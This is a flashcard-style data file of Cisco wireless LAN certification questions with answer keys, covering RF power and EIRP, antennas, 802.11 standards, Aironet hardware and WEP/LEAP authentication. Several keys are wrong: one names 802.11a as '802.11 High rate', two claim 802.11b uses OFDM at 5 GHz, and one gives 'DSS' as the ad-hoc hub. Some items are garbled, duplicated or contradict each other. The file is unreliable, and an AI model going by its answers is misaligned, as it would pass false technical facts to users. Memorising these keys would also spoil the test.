30.15	#Wlan4FE Q21 Your radio transmits at 20 dBm and you are using a 13.5 dBi Yagi with 50 feet cabling. The cabling has a loss of 6.7 dB per 100 feet. What is your EIRP in dB?												
E,F	#Wlan4FE Q22 What components must be configured to enable World mode in a WLAN system? (Choose two.)		^A: Cisco router		^B: Cisco switch		^C: non-Cisco router		^D: non-Cisco switch		^E: Cisco Access Point		^F: Cisco wireless client
radio frequency	#Wlan4FE Q23 What is RF a shorthand for?												
D	#Wlan4FE Q24 EIRP is a measurement of power from an RF system (transmitter, cabling, and antenna). Where is the measurement made?		^A: output of cabling		^B: output of the radio		^C: input of the antenna		^D: output of the antenna				
C,D	#Wlan4FE Q25 The 350 series Access Points programmed with U.S. channel sets have the option to reduce the power output to control the area of coverage. The power settings are 100 mW, 50 mW, 30 mW, 20 mW, 5 mW, and 1 mW. How does this allow the Access Points to be very scalable? (Choose two.)		^A: The receiver sensitivity decreases.		^B: The receiver sensitivity increases.		^C: You can create smaller coverage patterns.		^D: While covering the same floor, you can increase the ratio of Access Points to clients when it is set at 1 mW rather than 100 mW.				
basic	#Wlan4FE Q26 When one AP is connected to a wired network and a set of wireless stations it is referred to as a/an __________ Service Set.												
A,B	#Wlan4FE Q27 What could happen if water seeps into the connectors of the antenna cabling used to connect the antenna to the radio device? (Choose two.)		^A: The interior of the cable could corrode.		^B: The cabling could exhibit additional loss.		^C: Nothing happens because the center conductor is solid.		^D: Nothing happens because the outside jacket of the cabling is weatherproof.		^E: The cable could be more prone to static electric discharge from lightning strikes, making it more imperative that a lightning arrestor be used.		
A,D	#Wlan4FE Q28 How does a Workgroup Bridge (WGB) connect to Ethernet devices? (Choose two.)		^A: Ethernet patch cable to a hub		^B: Ethernet crossover cable to a hub		^C: Ethernet patch cable to a single device		^D: Ethernet crossover cable to a single device				
B	#Wlan4FE Q29 Network managers are using WLANs to facilitate:		^A: security		^B: network moves		^C: cost savings		^D: performance tuning				
C	#Wlan4FE Q30 A customer has a current site with an omni-directional antenna. It has 50 ft. of cabling that they are increasing to 100 ft. This change in cabling could _________.		^A: increase the data rate		^B: increase the coverage area		^C: decrease the coverage area		^D: decrease the angle of radiation from the antenna				
B,C	#Wlan4FE Q31 A Cisco Workgroup Bridge (WGB) can associate to _________. (Choose two.)		^A: another Cisco WGB		^B: a Cisco Aironet Access Point		^C: a Cisco Aironet wireless bridge		^D: a non-Cisco 802.11b compliant Access Point				
A	#Wlan4FE Q32 Most corporate wireless LANs operate in ___________ mode.		^A: Infrastructure		^B: Basic		^C: Extended		^D: Ad-hoc				
A	#Wlan4FE Q33 The frequencies that an antenna is tuned for are referred to as the antenna's __________.		^A: bandwidth		^B: beamwidth		^C: Fresnel range		^D: frequency separation				
B,D	#Wlan4FE Q34 In ad-hoc mode, the Cisco Aironet wireless PCMCIA client can talk to which two devices? (Choose two.)		^A: Cisco Aironet Access Points		^B: Cisco Aironet PCI wireless adaptor		^C: Cisco Aironet Workgroup Bridge (WGB)		^D: Cisco Aironet PCMCIA wireless adaptor
802.11b	#Wlan4FE Q35 All Cisco Aironet 350 Series client adapters are IEEE __________ compliant.								
B,C	#Wlan4FE Q36 What happens to an antenna's radiation pattern as the gain of the antenna increases?(Choose two.)		^A: The angle of radiation increases.		^B: The angle of radiation decreases.		^C: The coverage distance from the antenna increases.		^D: The coverage distance from the antenna decreases.
C,D	#Wlan4FE Q37 The PCM352 has two LEDs. What indicates that the card is working properly (not necessarily associated)? (Choose two.)		"^A: green LED off; amber LED solid"		"^B: green LED off; amber LED blinking sporadically"		"^C: green LED blinking fast; amber LED blinking sporadically"		"^D: green LED blinking slowly; amber LED blinking sporadically"
SSID	#Wlan4FE Q38 What is the common network name for the devices in a WLAN subsystem?								
B,C	#Wlan4FE Q39 Which two antennas radiate in a 360 degree pattern (as viewed from the top)? (Choose two.)		^A: Yagi		^B: omni		^C: dipole		^D: patch
B	#Wlan4FE Q40 What is the total maximum length of Ethernet cabling that can be used when powering the 350 series Access point?		^A: 50 meters		^B: 100 meters		^C: 300 meters		^D: no limit
B	#Wlan4FE Q41 With a WLAN, any WLAN client within an access point service area can receive data transmitted to or from the access point.		^A: This is not always true - must be judged case by case		^B: True		^C: False		
C	#Wlan4FE Q42 You are trying to provide coverage down a long hallway with your antenna at the end of the hallway. Which antenna should you use?		^A: 12 dBi omni		^B: 5.2 dBi omni		^C: 8.5 dBi patch		^D: 2.14 dBi dipole
D	#Wlan4FE Q43 What DC voltage is used to power the Access Points through the use of in-line power to the Ethernet port?		^A: -5 VDC		^B: -9 VDC		^C: -12 VDC		^D: -48 VDC
A	#Wlan4FE Q44 AirSnort is a tool for ________.		^A: breaking the WEP key		^B: tuning the WLAN		^C: site backup		^D: site surveying
B	#Wlan4FE Q45 The 2.4 GHz 6 dBi patch antenna has what vertical beamwidth?		^A: 21.5 degrees		^B: 65 degrees		^C: 85 degrees		^D: 170 degrees
A	#Wlan4FE Q46 In Cisco's server-based authentication security scheme, what device is used as the supplicant of the system?		^A: client		^B: switch		^C: Access Point		^D: authentication server
D	#Wlan4FE Q47 ________ is the amount of time it takes a radio to change from one channel to a different channel.		^A: Hop Sequence		^B: Dwell Time		^C: Dwell Frequency		^D: Hop Time
A	#Wlan4FE Q48 A customer wants to have coverage in a square courtyard that is surrounded by buildings. There is no roof access for an antenna and it needs to be placed on the side of one of the buildings. Which antenna should you recommend for this application?		^A: 6 dBi patch		^B: 12 dBi omni		^C: 13.5 dBi Yagi		^D: 2.14 dBi dipole
C	#Wlan4FE Q49 Which component of a WLAN is used to radiate the RF signal to create the cell structure?		^A: radio		^B: client		^C: antenna		^D: Access Point
C	#Wlan4FE Q50 The 802.11 standard supports which two means of client authentication?		^A: aggregated and shared-key authentication		^B: closed and shared-key authentication		^C: open and shared-key authentication				
D	#Wlan4FE Q51 The most common occurrence of multipath interference comes from __________.		^A: a point-to-point bridge link		^B: in-building open air coverage		^C: a point-to-multipoint bridge link		^D: in-building cluttered environment		
B	#Wlan4FE Q52 How do Cisco/Aironet 802.11b radios perform their transmissions?		^A: full duplex		^B: half duplex		^C: single side-band		^D: depends upon data rate		
A,B	#Wlan4FE Q53 Cisco Aironet 350 Series Client Adapters are available in what formats? (Choose all that apply.)		^A: PCI		^B: PCMCIA		^C: ISA		^D: VESA		
C	#Wlan4FE Q54 What happens when a tree or other foliage is in the direct path between the transmitter and receiver of a 2.4 GHz signal?		^A: The signal is reflected		^B: The signal is refracted		^C: The signal is absorbed		^D: The signal is diffracted		
D	#Wlan4FE Q55 In 802.11, how does a client use a null value for their SSID and still associate to an Access Point?		^A: through the use of LEAP		^B: through open authentication		^C: through shared-key operation		^D: through the use of a Broadcast SSID		^E: by the use of a null character in the Access Point's SSID field
B	#Wlan4FE Q56 If a device that uses static WEP keys is lost or stolen, the possessor of the stolen device can access the WLAN.		^A: This is not always true - must be judged case by case		^B: True		^C: False				
B	#Wlan4FE Q57 Which specific antenna architecture is used to help eliminate RF null areas of coverage?		^A: splitters		^B: diversity		^C: high gain omni		^D: patch antennas		
A,D	#Wlan4FE Q58 What can you do to resolve RF noise issues within the 802.11b cell structure? (Choose two.)		^A: use a directional antenna when possible		^B: use a diversity antenna on the Access Point		^C: use an amplifier in-line to overcome the noise		^D: change the channel on which the Access Point is configured		
DSSS	#Wlan4FE Q59 The wireless medium of Cisco Aironet 350 Series Client Adapter is?										
A,B	#Wlan4FE Q60 There are two antenna connectors on the Cisco Aironet Access Points. What are two reasons antennas are used on both ports? (Choose two.)		^A: to help eliminate null zones		^B: to use two antennas for diversity to overcome multipath distortion		^C: to allow for full-duplex operation of the radio (one antenna for transmit and one for receive)		^D: to reduce the number of Access Points needed in an area by using directional antennas aimed in two different directions		
B,D,E	#Wlan4FE Q61 When doing a survey in a hospital application, which three should you consider? (Choose three.)		^A: pagers		^B: fire doors		^C: televisions		^D: microwave ovens		^E: radiology/X-ray areas
CSMA/CA	#Wlan4FE Q62 What media access protocol does the Cisco Aironet 350 Series Client Adapter use?										
D	#Wlan4FE Q63 What is the maximum EIRP of a 2.4 GHz RF system for use in an ETSI regulated country?		^A: 1 W		^B: 4 W		^C: 50 mW		^D: 100 mW		^E: 250 mW
A	#Wlan4FE Q64 Under the 802.11b standard, what modulation is used when transmitting data at 11 Mbps?		^A: CCK		^B: QAM		^C: BPSK		^D: QPSK		
B	#Wlan4FE Q65 All Cisco wireless client adapters include the Cisco Aironet Client Utility for ________.		^A: antenna adjustment		^B: adapter configuration		^C: site backup				
D	#Wlan4FE Q66 ________ is the amount of time it takes a radio to change from one channel to a different channel.		^A: Hop Sequence		^B: Dwell Time		^C: Dwell Frequency		^D: Hop Time		
B,D	#Wlan4FE Q67 How can you send more data across the airwaves? (Choose two.)		^A: utilize lower band frequencies		^B: use more complex modulation		^C: use better filtering on the receiver		^D: use more frequency (wider bandwidth)		
WECA	#Wlan4FE Q68 The Wi-Fi alliance was formerly known as?										
B	#Wlan4FE Q69 What is the total bandwidth of the 2.4 GHz ISM band?		^A: 70 MHz		^B: 83.5 MHz		^C: 90 MHz		^D: 100 MHz		
hopping	#Wlan4FE Q70 With FHSS, the transmission frequencies are determined by a ________ code.										
A,B	#Wlan4FE Q71 The Cisco Aironet 1200 Series is compliant with what IEEE standards? (Choose all that apply.)		^A: 802.11a		^B: 802.11b		^C: 802.11x		^D: 802.11g		^E: 802.11c
C	#Wlan4FE Q72 An 802.11b radio utilizes how much of the 2.4 GHz ISM band for transmission?		^A: 1 MHz		^B: 11 MHz		^C: 22 MHz		^D: 83.5 MHz		
A	#Wlan4FE Q73 Cisco Aironet 1200 Series allows for both singleband configuration.		^A: True		^B: False		^C: This is not always true - must be judged case by case				
B	#Wlan4FE Q74 With DSSS, chipping code divides the user data according to a ________.		^A: output parameter		^B: spreading ratio		^C: input parameter		^D: user rate		
E	#Wlan4FE Q75 How many 2.4 GHz RF channels for DSSS are available in Japan?		^A: 2		^B: 9		^C: 11		^D: 13		^E: 14
Cisco LEAP	#Wlan4FE Q76 Cisco has developed an 802.1X authentication type called EAP Cisco Wireless, which is also known as?										
DSSS	#Wlan4FE Q77 _______ is a transmission technology used in WLAN transmissions where data signal at the sending station is combined with chipping code that divides the user data according to a spreading ratio.										
C	#Wlan4FE Q78 After June 1994, FCC and DOC regulations require all antenna connectors to be proprietary (unique and non-standard). Cisco/Aironet has since used what connector on its Access Points and bridges?		^A: BNC		^B: RP-SMA		^C: RP-TNC		^D: N-connector		
75	#Wlan4FE Q79 Current FCC regulations require WLAN product manufacturers to use _____ or more frequencies per transmission channel.										
D	#Wlan4FE Q80 With FHSS, data signal is modulated with a ___________ carrier signal.		^A: zeroband		^B: broadband		^C: neutralband		^D: narrowband		
A	#Wlan4FE Q81 In the United States, what is the maximum EIRP that is allowed in a 5 GHz UNII-1 RF system?		^A: 250 mW		^B: 500 mW		^C: 1 W		^D: 4 W		
Wi-Fi	#Wlan4FE Q82 An organization made up of leading wireless equipment and software providers with missions of certifying all 802.11-based products for interoperability is known as the ____________ alliance.												
C,F	#Wlan4FE Q83 Which 5 GHz bands in the United States are designated for outdoor use only? (Choose two.)		^A: UNII-1		^B: UNII-2		^C: UNII-3		^D: 5.15-5.25 GHz		^E: 5.25-5.35 GHz		^F: 5.725-5.825 GHz
C	#Wlan4FE Q84 According to FCC regulations, the maximum power output of a 2.4 GHz radio is _____.		^A: 17 dBm		^B: 20 dBm		^C: 30 dBm		^D: 36 dBm				
5	#Wlan4FE Q85 802.11a works at the _________ GHz band?												
C,D	#Wlan4FE Q86 Which two types of packets are able to get through prior to a client being authenticated with server-based authentication? (Choose two)		^A: Data packets		^B: DHCP packets		^C: EAP authentication packets		^D: 802.11 open authentication packets				
A,B,C	#Wlan4FE Q88 Filtering can be performed on an Access Point at which three layers of the OSI model? (Choose three)		^A: Layer 2		^B: Layer 3		^C: Layer 4		^D: Layer 5				
B	#Wlan4FE Q89 What information is needed when using the IP Setup Utility (IPSU) to determine the IP address of a specific Access Point?		^A: DNS name of the Access Point		^B: MAC address of the Access Point		^C: Serial number of the Access Point		^D: The switch and switch port it is attached to				
C	#Wlan4FE Q90 When configuring the Cisco Secure ACS server for use with WLANs, the Network Access Server is _______.		^A: The ACS server's IP address		^B: The ACS server's DNS name		^C: Individual Access Points on the network		^D: The master Access Point on the network				
D	#Wlan4FE Q91 How many different WEP keys will the client be aware of in each cell using Cisco's server-based authentication method?		^A: 1		^B: 2		^C: 3		^D: 4				
B	#Wlan4FE Q92 When deploying Access Points in hot-standby mode, which channel is used by the standby Access Point?		^A: It scans all available channels.		^B: It uses the same channel as the primary Access Point.		^C: It uses a channel adjacent to the primary Access Point.		^D: The radio is off until an SNMP trap is sent by the primary.				
A,C	#Wlan4FE Q93 The IP Setup Utility (IPSU) can be used to configure which two Access Point parameters? (Choose two)		^A: SSID		^B: User name		^C: IP address		^D: RF channel				
C	#Wlan4FE Q94 Exhibit: You have a wireless LAN that you want to set up to only pass traffic from one client to the RF. You have decided to set up a filter. What do you need to set up on the two exhibits?		"^A: Address Filter page: Allowed; Access Point Radio Advanced page: Allowed"		"^B: Address Filter page: Disallowed; Access Point Radio Advanced page: Allowed"		"^C: Address Filter page: Allowed; Access Point Radio Advanced page: Disallowed"		"^D: Address Filter page: Disallowed; Access Point Radio Advanced page: Disallowed"		
C	#Wlan4FE Q95 You are using the Message Integrity Check (MIC) feature for enhancing security. Where is the additional MIC information placed in the 802.11 packets?		^A: Trailer		^B: Header		^C: Data portion (payload)		^D: Initialization Vector (IV)				
B	#Wlan4FE Q96 Your client is configured in the following way: SSID1 = 1234, Encryption Key 1 = 0123456789, Authentication Type = Open. Which Access Point configuration will work with your client?		^A: SSID = 1234, Encryption Key 1 = 1234567890, Authentication Type = Open		^B: SSID = 1234, Encryption Key 1 = 0123456789, Authentication Type = Open		^C: SSID = 1234a, Encryption Key 1 = 0123456789, Authentication Type = Open		^D: SSID = 1234, Encryption Key 1 = 0123456789, Authentication Type = Shared Key				
B,C	#Wlan4FE Q97 Which two can be used to access the CLI screens on an Access Point? (Choose two)		^A: IPSU		^B: Console port		^C: Telnet session		^D: Browser window				
C	#Wlan4FE Q98 When using 128-bit data encryption, how many bits is the Initialization Vector (IV)?		^A: 4-bits		^B: 16-bits		^C: 24-bits		^D: 48-bits
A	#Wlan4FE Q99 An Access Point set up as a repeater will pass data traffic through which port?		^A: Radio port		^B: Bridge port		^C: Console port		^D: Ethernet port
C	#Wlan4FE Q100 When using omni-directional antennas, which is the best and most systematic way to conduct a site survey?		^A: Use 2.412 GHz when surveying.		^B: Perform a two dimensional survey.		^C: Start from every corner of the floor and move inward		^D: Start from the middle of the floor and go to every corner of the floor.
A	#Wlan4FE Q102 Access Point10 in root mode (SSID = 123) provides connection to repeater Access Point20 (SSID = 123). If Access Point10 is using Channel 1, what channel will Access Point20 use?		^A: Channel 1		^B: Channel 6		^C: Any channel except Channel 1.		^D: Channel is not a concern in this application.
C	#Wlan4FE Q103 A customer wants to make a wireless bridge link, which is a 20 km distant wireless link in Europe, with BR350s. Which statement is true?		^A: This cannot be done.		^B: The customer must use 21 dBi dish antennas and an amplifier.		^C: It cannot be done without the use of a repeater site and four bridges.		^D: If the customer uses 6 dBi patch antennas there should be no problem.
B	#Wlan4FE Q104 The elliptical immediately surrounding the visual path of an RF signal is often referred to as ________.		^A: Line of sight		^B: The Fresnel zone		^C: Free space path loss		^D: Atmospheric absorption
B	#Wlan4FE Q105 You are installing two new, factory default BR352s. What must you do for them to be able to pass traffic?		^A: Set the Ethernet port to active.		^B: Set the Root to off on the remote bridge.		^C: You do nothing. They will communicate with default settings.		^D: Set the frequency of the remote bridge to match the master bridge frequency.
D	#Wlan4FE Q106 The center LED (status) flashes amber on a Cisco Aironet wireless bridge. Which statement is true?		^A: A beacon packet is transmitted.		^B: It is the light sequence of the Find utility.		^C: An association from a client is established.		^D: An error occurred and was written in the log.
B,C	#Wlan4FE Q107 What are two appropriate methods for increasing the distance that two bridges can communicate? (Choose two)		^A: Disable WEP.		^B: Lower the data rate transmission.		^C: Use an antenna with a decreased beam width.		^D: Use an antenna with an increased beam width.
C	#Wlan4FE Q108 The most efficient and effective method of sealing the connectors exposed to the environment is to use ________.		^A: RTV		^B: Duct tape		^C: COAX-SEAL		^D: Electrical tape
A	#Wlan4FE Q109 If a root Access Point is set at channel 6, what channel will a repeater Access Point use to associate to it?		^A: Channel 6		^B: Any channel		^C: Any other non-overlapping channel		^D: It depends on the SSID
A,C	#Wlan4FE Q110 What are two functions of a lightning arrestor that is used in conjunction with Cisco Aironet wireless bridges?		^A: Dissipates any energy from a near lightning strike.		^B: Dissipates all the energy from a direct lightning strike.		^C: Bleeds off static discharges to help prevent a direct lightning strike.		^D: Adds attenuation to the signal and separates data from the lightning strike's energy.
B	#Wlan4FE Q111 Two buildings have a Cisco Aironet Access Point installed at each site connecting to the Ethernet LAN in each building. There is a 21 dBi dish antenna using 20 ft. cabling in each building and the antennas are aimed at each other. The buildings are one mile apart with clean line of sight. There is no network connection between the two networks. What is a potential problem?		^A: The root parameters have not been set properly.		^B: Access Points cannot be used for this mode of operation.		^C: The dish antennas are too high of gain for the 1 mile distance.		^D: The cables are too long for this distance/antenna combination.
B	#Wlan4FE Q112 How far is typical line of sight, without the use of towers, buildings, etc?		^A: 2 miles		^B: 6 miles		^C: 18 miles		^D: 24 miles
A	#Wlan4FE Q113 You need to run 150 ft. coaxes on both ends of a point-to-point bridge link in the U.S. with BR350s. You decide to utilize LMR-600, which has a loss of 4.4 dB/100 feet. What is the EIRP of the system if running at 11 Mb with the Aironet 21 dBi dish antennas?		^A: 34.4 dBm		^B: 36.2 dBm		^C: 45.3 dBm		^D: 47.6 dBm
B,C,D	#Wlan4FE Q114 Which three methods are used to determine the direction in which to align the antennas? (Choose three)		^A: Cellular triangulation		^B: Balloon and binoculars		^C: Strobe light and binoculars		^D: Global Positioning System (GPS)
B	#Wlan4FE Q115 TestKing.com, a customer, has an installed 4-mile wireless link using Cisco Aironet wireless bridges in the U.S. It is currently running at 2 Mb, with 13.5 Yagi antennas (vertically polarized), and 50 ft. of Cisco cabling on each side. The customer now needs the wireless pipe to be increased by 11 Mb. The cabling cannot be shortened due to physical limitations. What can be done to make this a solid 11 Mb pipe?		^A: Utilize an amplifier on each site.		^B: Replace the Yagis with dish antennas.		^C: Rotate the antennas 90 degrees and use horizontal polarization.		^D: Increase the power output of the radios using firmware 10.10T or greater.		
D	#Wlan4FE Q116 How many authentication servers can be configured on the Access Point?		^A: 1		^B: 2		^C: 3		^D: 4		
C,D	#Wlan4FE Q117 You are setting up a user through User Manager on the Access Point menu screen. Which two rights does that user require if it is an SNMP community with read-only privileges? (Choose two)		^A: Ident		^B: Write		^C: SNMP		^D: Admin		^E: Firmware
A	#Wlan4FE Q118 Which statement is true about Cisco's server-based authentication process?		^A: It is mutual authentication between server and client.		^B: The authentication method is one way (client to server).		^C: The authentication method is one way (server to client).		^D: The authentication method is dependent upon which 802.11 authentication method is used (open vs. shared key).
B#Wlan4SE Q 1. 802.11 works at the 900 MHz band.	^A. True	^B. False	^C. This is not always true - must be judged case by case.
B#Wlan4SE Q 2. The maximum transmission speed of 802.11 is _______ Mbps.	^A. 1	^B. 2	^C. 15	^D. 10
A#Wlan4SE Q 3. In ad-hoc mode, what acts as a communication hub for users of a wireless device to connect to a wired LAN?	^A. DSS	^B. ISSS	^C. CSD	^D. AP
B#Wlan4SE Q 4. Which 802.11 standard is also referred to as 802.11 High rate?	^A. 802.1x	^B. 802.11a	^C. 802.11b
A#Wlan4SE Q 5. 802.11 can make use of direct sequence spread spectrum only when running at the 5 GHz band.	^A. False	^B. True	^C. This is not always true - must be judged case by case.
A#Wlan4SE Q 6. Ad-hoc mode is generally good for small group of informal use.	^A. True	^B. This is not always true - must be judged case by case	^C. False
A,B#Wlan4SE Q 7. What differentiates the FCC and ETSI regulations pertaining to 802.11b Wireless LANs? (Choose two.)	^A. power output of the radio	^B. number of defined channels	^C. number of clients allowed per Access Point	^D. type of antenna connector used on Access Points
A#Wlan4SE Q 8. 802.11b supports the use of orthogonal frequency division multiplexing at which band?	^A. 5 GHz	^B. 2.4 GHz	^C. 900 MHz	^D. 1.2 GHz
B#Wlan4SE Q 9. All Cisco Aironet 350 Series client adapters are IEEE 802.11g compliant.	^A. True	^B. False
B#Wlan4SE Q 10. With Ad-Hoc mode, an AP is:	^A. needed	^B. not needed	^C. This is hard to say - must be judged case by case.
C#Wlan4SE Q 11. In infrastructure mode, devices communicating with each other MUST first go through an Access Point.	^A. This is not always true - must be judged case by case	^B. False	^C. True
D#Wlan4SE Q 12. If the power output of a radio is equal to 100 mW, what is its equivalent rating in dBm?	^A. 5 dBm	^B. 10 dBm	^C. 15 dBm	^D. 20 dBm
A#Wlan4SE Q 13. Cisco LEAP is also known as:	^A. EAP Cisco Wireless	^B. Aironet Secure	^C. Cisco Secure Works	^D. Cisco Dial-in User Service
Extended Service Set #Wlan4SE Q 14. What does ESS stand for?
D#Wlan4SE Q 15. An 802.11a radio utilizes what technique to transmit its signal?	^A. IR	^B. DSSS	^C. FHSS	^D. OFDM
Basic Service Set #Wlan4SE Q 17. What does BSS stand for?
isotropic #Wlan4SE Q 18. The designator dBi is a decibel referenced to a(an) _________ radiator.
D#Wlan4SE Q 19. 802.11a has a max throughput of ________ Mbps transmission.	^A. 2 	^B. 11	^C. 2.4	^D. 54
D#Wlan4SE Q 20. Most small informal wireless LANs operate in _________ mode.	^A. Extended	^B. Basic	^C. Infrastructure	^D. Ad-hoc
B#Wlan4SE Q 21. An antenna is rated at 0 dBd. What is its rating in dBi?	^A. 1	^B. 2.14	^C. 3.1	^D. 3.6
A#Wlan4SE Q 22. 802.11 supports the use of frequency hopping spread spectrum.	^A. True	^B. This is not always true - must be judged case by case	^C. False
C#Wlan4SE Q 23. Network managers are using WLANs due to the need for:	^A. security	^B. performance	^C. flexibility	^D. cost savings
B#Wlan4SE Q 24. What is EIRP?	^A. Effective Intermittent Radio Power	^B. Effective Isotropic Radiated Power	^C. Elevated Intermittent Radiated Power	^D. Effective International Radiated Power
A#Wlan4SE Q 25. What is necessary to determine the placement of the individual Access Points?	^A. site survey	^B. program analysis	^C. hop count to gateway	^D. Nothing needs to be done if fewer than 11 Access Points are used.
A#Wlan4SE Q 26. Most wireless LAN technologies in use today are based on RF field propagation.	^A. True	^B. False	^C. This is not always true - must be judged case by case
A,B,C#Wlan4SE Q 27. Which three variables directly affect the EIRP value of an RF system (Choose three.)	^A. power of radio	^B. gain of antenna	^C. length of cabling	^D. receiver sensitivity of radio
B#Wlan4SE Q 28. There are 11 channels defined within the North American Direct Sequence channel set. How many of these channels do not overlap?	^A. 2	^B. 3
B#Wlan4SE Q 29. The 802.11 standard supports open and shared-key authentication when RADIUS is configured properly.	^A. True	^B. False	^C. This is not always true - must be judged case by case
A,D#Wlan4SE Q 30. Installing antenna extension cable decreases ________. (Choose two.)	^A. the coverage distance	^B. the antenna's bandwidth	^C. the antenna's angle of radiation	^D. effective isotropic radiated power
B#Wlan4SE Q 31. A customer wants a LAN inside their historical building for administration purposes and for selling souvenirs. ^  They are unable to run Ethernet due to the fact the building cannot be marred in any way. ^   You recommend a wireless LAN but when doing your site survey you find that one will not cover the whole building. ^ What is your recommendation?	^A. use a diversity antenna system for better coverage	^B. use a wireless repeater to help cover the other areas	^C. place an amplifier on the Access Point for more power	^D. increase the power output of the radio with version 10.10T (or greater) of the Access Point firmware.
A#Wlan4SE Q 32. An SSID prevents access by any client device that does not have the SSID.	^A. True	^B. False	^C. This is not always true - must be judged case by case
C#Wlan4SE Q 33. A customer has a current site with an omni-directional antenna. It has 50 ft. of cabling that they are increasing to 100 ft.	^  This change in cabling could ________.	^A. increase the data rate	^B. increase the coverage area	^C. decrease the coverage area	^D. decrease the angle of radiation from the antenna
C,D#Wlan4SE Q 34. The 350 series Access Points programmed with U.S. channel sets have the option to reduce the power output to control the area of coverage. ^  The power settings are 100 mW, 50 mW, 30 mW, 20 mW, 5 mW, and 1 mW. ^  How does this allow the Access Points to be very scalable? (Choose two.)	^A. The receiver sensitivity decreases.	^B. The receiver sensitivity increases.	^C. You can create smaller coverage patterns.	^D. While covering the same floor, you can increase the ratio of Access Points to clients when it is set at 1 mW rather than 100 mW.
B#Wlan4SE Q 35. Cisco Aironet 350 Series Client Adapters are available in what formats for notebook computers? (Choose all that apply.)	^A. PCI	^B. PCI Card	^C. ISA	^D. VISA
A#Wlan4SE Q 36. What is the increase in energy that an antenna appears to add to an RF signal?	^A. gain	^B. VSWR	^C. bandwidth	^D. polarization
C#Wlan4SE Q 37. A school has an external classroom in a trailer located next to the main school building. ^  There are six computers in the remote classroom that need to connect to the main school. ^  The main school building already has a Cisco Access Point infrastructure located within it.^ What wireless product would best connect the classroom to the main building?	^A. bridge	^B. Access Point	^C. Workgroup Bridge (WGB)	^D. wireless PCI clients in every computer
B#Wlan4SE Q 38. WEP key is _______.	^A. highly secure	^B. breakable	^C. always safe
D#Wlan4SE Q 39. What is the angle of coverage that an antenna radiates?	^A. gain	^B. diversity	^C. bandwidth	^D. beamwidth	^E. Fresnel zone
D#Wlan4SE Q 40. What is the maximum number of wired clients that can send packets through the WGB342 to an Access point?	^A. 2	^B. 4	^C. 6	^D. 8
C#Wlan4SE Q 41. With a WLAN, any WLAN client within an access point service area can receive data transmitted to or from the access point as long as both devices are of the same brand.	^A. True	^B. This is hard to say - depends on the structure	^C. False
B#Wlan4SE Q 42. An omni-directional antenna that is designated to radiate at a slight angle rather than at 90 degrees from the vertical element has __________.	^A. gain	^B. downtilt	^C. beamwidth	^D. sectorization
B,C#Wlan4SE Q 43. In adhoc mode, the Cisco Aironet wireless PCMCIA client can talk to which two devices? (Choose two.)	^A. Cisco Aironet Access Points	^B. Cisco Aironet PCI wireless adaptor	^C. Cisco Aironet PCMCIA wireless adaptor	^D. Cisco Aironet Workgroup Bridge (WGB)
A#Wlan4SE Q 44. 802.11b supports the use of orthogonal frequency division multiplexing at which band?	^A. 5 GHz	^B. 2.4 GHz	^C. 900 MHz	^D. 1.2 GHz
A,D#Wlan4SE Q 45. Which two statements are true when the gain of an omni-directional antenna increases? (Choose two.)	^A. The coverage distance increases.	^B. The coverage distance decreases.	^C. The coverage increases directly above and below the antenna.	^D. The coverage decreases directly above and below the antenna.
D#Wlan4SE Q 46. Which statement is true about a peer-to-peer connection (ad hoc mode)?	^A. It requires a bridge to connect two or more wireless clients.	^B. It requires an Access Point to connect two or more wireless clients.	^C. It needs both an Access Point and BR to connect the wireless clients.	^D. It allows you to connect wireless clients without the use of an Access Point or BR.
A#Wlan4SE Q 47. In general, it is not easy for an administrator to detect that an unauthorized user has infiltrated the WLAN.	^A. True	^B. This is not always true - must be judged case by case	^C. False
B#Wlan4SE Q 48. The antennas that Cisco sells for the Aironet product line are polarized in what fashion?	^A. spatial	^B. vertical	^C. horizontal	^D. antenna dependent
A,B#Wlan4SE Q 49. The in-line power injector that is supplied with the 350 series Access Point can power which two devices? (Choose two.)	^A. Cisco Aironet 350 series bridge	^B. Cisco Aironet 350 series Access Point	^C. Cisco Aironet 340 series Access Point	^D. Cisco Aironet 350 Workgroup Bridge (WGB)
A#Wlan4SE Q 50. Wireless LAN uses	^A. collision avoidance	^B. collision recovery	^C. collision detection
B#Wlan4SE Q 51. The 2.4 GHz 6 dBi patch antenna has what vertical beamwidth?	^A. 21.5 degrees	^B. 65 degrees	^C. 85 degrees	^D. 170 degrees
C,D#Wlan4SE Q 52. Which two can power the Cisco Aironet 350 series Access Points? (Choose two.)	^A. Cisco 1751 router	^B. Cisco 2924-XL switch	^C. Cisco 3524-PWR-XL switch	^D. Cisco Cat6K switch with WS-X6348 blade
C#Wlan4SE Q 53. Network managers are using WLANs due to the need for:	^A. security	^B. performance	^C. flexibility	^D. cost savings
A,C#Wlan4SE Q 54. Which two Cisco Aironet antennas are directional antennas? (Choose two.)	^A. 6 dBi patch	^B. 2.14 dipole	^C. 13.5 dBi Yagi	^D. 5.2 dBi Diversity pillar mount
A,D#Wlan4SE Q 55. Which two devices from Cisco allow for the wireless connection of two wired LANs? (Choose two.)	^A. bridge	^B. Access Point	^C. wireless client	^D. Workgroup Bridge (WGB)
aironet Client Utility#Wlan4SE Q 56. All Cisco wireless client adapters include the Cisco ACU. What does the ACU stand for?
A#Wlan4SE Q 57. Which Cisco antenna has the narrowest angle of radiation?	^A. 21 dBi dish	^B. 6 dBi patch	^C. 13.5 dBi Yagi	^D. 8.5 dBi patch
A,B#Wlan4SE Q 58. Which two devices allow wireless 802.11b clients the ability to communicate with a wired LAN? (Choose two.)	^A. bridge	^B. Access Point	^C. 802.11b PCMCIA card	^D. Workgroup Bridge (WGB)
A#Wlan4SE Q 59. Hopping code is found in.	^A. FHSS	^B. DSSS	^C. CDDS	^D. CSMA/CD
A#Wlan4SE Q 60. The anomaly that occurs when RF signals bounce off of objects and are received out of phase at the receiver is often referred to as _____________.	^A. multipath	^B. a Fresnel zone	^C. signal absorption	^D. microwave interference
B#Wlan4SE Q 61. Which product radio type is considered by WECA to be WiFi compliant?	^A. 802.11 FHSS products	^B. 802.11b DSSS products	^C. 802.11b FHSS products	^D. 802.11 DSSS 1 and 2 Mbps products
D#Wlan4SE Q 62. Current FCC regulations require WLAN product manufacturers to use a maximum dwell time of ________ ms.	^A. 100	^B. 200	^C. 300	^D. 400
C#Wlan4SE Q 63. What occurs when a tree or other foliage is in the direct path between the transmitter and receiver of a 2.4 GHz signal?	^A. The signal is reflected.	^B. The signal is refracted.	^C. The signal is absorbed.	^D. The signal is diffracted.
C#Wlan4SE Q 64. What is the seal that is issued by WECA to show that a product has passed interoperability testing with other manufacturer's 802.11b products?	^A. HiFi	^B. WHY	^C. WiFi	^D. WECA
